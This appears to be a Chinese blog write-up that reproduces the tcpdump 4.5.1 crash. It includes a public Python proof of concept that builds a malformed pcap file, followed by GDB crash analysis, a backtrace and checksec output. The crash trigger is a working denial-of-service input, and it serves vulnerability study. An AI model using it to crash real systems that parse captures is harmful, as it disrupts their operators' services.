漏洞介绍

漏洞环境

Ubuntu14.04

IDA

GDB

漏洞复现

漏洞POC,用于生成造成崩溃的crash文件

# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: <http://www.tcpdump.org>
# Software Link: <http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz>
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
 
from subprocess import call
from shlex import split
from time import sleep
 
def crash():
 
    command = 'tcpdump -r crash'
 
    buffer     =   '\\xd4\\xc3\\xb2\\xa1\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\xf5\\xff'
    buffer     +=  '\\x00\\x00\\x00I\\x00\\x00\\x00\\xe6\\x00\\x00\\x00\\x00\\x80\\x00'
    buffer     +=  '\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00<\\x9c7@\\xff\\x00'
    buffer     +=  '\\x06\\xa0r\\x7f\\x00\\x00\\x01\\x7f\\x00\\x00\\xec\\x00\\x01\\xe0\\x1a'
    buffer     +=  "\\x00\\x17g+++++++\\x85\\xc9\\x03\\x00\\x00\\x00\\x10\\xa0&\\x80\\x18\\'"
    buffer     +=  "xfe$\\x00\\x01\\x00\\x00@\\x0c\\x04\\x02\\x08\\n', '\\x00\\x00\\x00\\x00"
    buffer     +=  '\\x00\\x00\\x00\\x00\\x01\\x03\\x03\\x04'
 
    with open('crash', 'w+b') as file:
        file.write(buffer)
 
    try:
        call(split(command))
        print("Exploit successful!             ")
    except:
        print("Error: Something has gone wrong!")
 
def main():
 
    print("Author:   David Silveiro                           ")
    print("   tcpdump version 4.5.1 Access Violation Crash    ")
 
    sleep(2)
    crash()
 
if __name__ == "__main__":
    main()

我们尝试用tcpdump去加载这个crash文件

vincebye@ubuntu:~/Desktop$ tcpdump -r crash
Segmentation fault (core dumped)

显示出现了段错误，我们用GDB去运行tcpdump来加载crash文件看看

vincebye@ubuntu:~/Desktop$gdb tcpdump
vincebye@ubuntu:~/Desktop$run -r crash
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x8229001 
EBX: 0xbfffdce9 ("......")
ECX: 0x2e ('.')
EDX: 0x0 
ESI: 0x8229001 
EDI: 0xbfffdccf --> 0x30303000 ('')
EBP: 0x0 
ESP: 0xbfffdc70 --> 0xbfffdcca (" 0000")
EIP: 0x80542da (<hex_and_ascii_print_with_offset+106>:	movzx  eax,BYTE PTR [eax-0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80542d2 <hex_and_ascii_print_with_offset+98>:	movzx  edx,BYTE PTR [esi]
   0x80542d5 <hex_and_ascii_print_with_offset+101>:	lea    eax,[esi+0x2]
   0x80542d8 <hex_and_ascii_print_with_offset+104>:	mov    esi,eax
=> 0x80542da <hex_and_ascii_print_with_offset+106>:	movzx  eax,BYTE PTR [eax-0x1]
   0x80542de <hex_and_ascii_print_with_offset+110>:	mov    DWORD PTR [esp+0x10],0x80def60
   0x80542e6 <hex_and_ascii_print_with_offset+118>:	mov    DWORD PTR [esp+0xc],0x29
   0x80542ee <hex_and_ascii_print_with_offset+126>:	movzx  ecx,dl
   0x80542f1 <hex_and_ascii_print_with_offset+129>:	mov    DWORD PTR [esp+0x14],ecx
[------------------------------------stack-------------------------------------]
0000| 0xbfffdc70 --> 0xbfffdcca (" 0000")
0004| 0xbfffdc74 --> 0x15 
0008| 0xbfffdc78 --> 0x1 
0012| 0xbfffdc7c --> 0x29 (')')
0016| 0xbfffdc80 --> 0x80def60 (" %02x%02x")
0020| 0xbfffdc84 --> 0x0 
0024| 0xbfffdc88 --> 0x0 
0028| 0xbfffdc8c --> 0xb7e16ed4 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=ident@entry=0x80e880f "\\n\\t", cp=0x8229001 <error: Cannot access memory at address 0x8229001>, cp@entry=0x8208085 "", length=length@entry=0xfffffff3, oset=0x20f70, 
    oset@entry=0x0) at ./print-ascii.c:91
91			s2 = *cp++;

我们查看一下操作的地址

gdb-peda$ x $eax-0x1
0x8229000:	Cannot access memory at address 0x8229000

发现该地址无法访问

执行bt命令查看调用栈

gdb-peda$ bt
#0  hex_and_ascii_print_with_offset (ident=ident@entry=0x80e880f "\\n\\t", cp=0x8229001 <error: Cannot access memory at address 0x8229001>, cp@entry=0x8208085 "", length=length@entry=0xfffffff3, 
    oset=0x20f70, oset@entry=0x0) at ./print-ascii.c:91
#1  0x08054507 in hex_and_ascii_print (ident=0x80e880f "\\n\\t", cp=0x8208085 "", length=0xfffffff3) at ./print-ascii.c:127
#2  0x08052129 in ieee802_15_4_if_print (ndo=0x8205b20 <Gndo>, h=0xbfffdee0, p=<optimized out>) at ./print-802_15_4.c:180
#3  0x080a87af in print_packet (user=0xbfffdfbc " [ \\b\\020 \\005\\b\\001", h=0xbfffdee0, sp=0x8208070 "@\\377") at ./tcpdump.c:1950
#4  0x080ca446 in pcap_offline_read (p=p@entry=0x82086f0, cnt=cnt@entry=0xffffffff, callback=callback@entry=0x80a8760 <print_packet>, user=user@entry=0xbfffdfbc " [ \\b\\020 \\005\\b\\001") at ./savefile.c:409
#5  0x080ba96f in pcap_loop (p=0x82086f0, cnt=cnt@entry=0xffffffff, callback=callback@entry=0x80a8760 <print_packet>, user=user@entry=0xbfffdfbc " [ \\b\\020 \\005\\b\\001") at ./pcap.c:849
#6  0x0804b50d in main (argc=0x3, argv=0xbffff194) at ./tcpdump.c:1569
#7  0xb7e2caf3 in __libc_start_main (main=0x804a5d0 <main>, argc=0x3, argv=0xbffff194, init=0x80d9590 <__libc_csu_init>, fini=0x80d9600 <__libc_csu_fini>, rtld_fini=0xb7fed300 <_dl_fini>, 
    stack_end=0xbffff18c) at libc-start.c:287
#8  0x0804c38e in _start ()

利用checksec命令查看一下tcpdump的保护情况

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

与教程不同，我们这里PIE(即ASLR)默认是关闭的

参考链接

https://whereisk0shl.top/post/2016-10-23-1
https://bbs.pediy.com/thread-261984.htm